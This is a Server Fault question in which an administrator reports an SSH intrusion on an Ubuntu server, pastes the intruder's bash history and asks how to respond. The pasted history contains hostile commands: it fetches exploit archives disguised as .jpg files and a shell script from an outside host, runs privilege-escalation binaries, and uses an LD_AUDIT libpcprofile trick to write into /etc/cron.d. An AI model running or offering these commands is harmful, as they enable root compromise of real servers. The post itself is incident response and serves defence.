Ubuntu Server hack
Posted
by
haxpanel
on Server Fault
See other posts from Server Fault
or by haxpanel
Published on 2011-02-28T23:09:25Z
Indexed on
2011/02/28
23:26 UTC
Read the original article
Hit count: 290
Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file:
w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh
vi a.sh
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd
The system is in a jail. Does it matter in the current case? What shall i do?
Thanks for everyone!!
I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines
© Server Fault or respective owner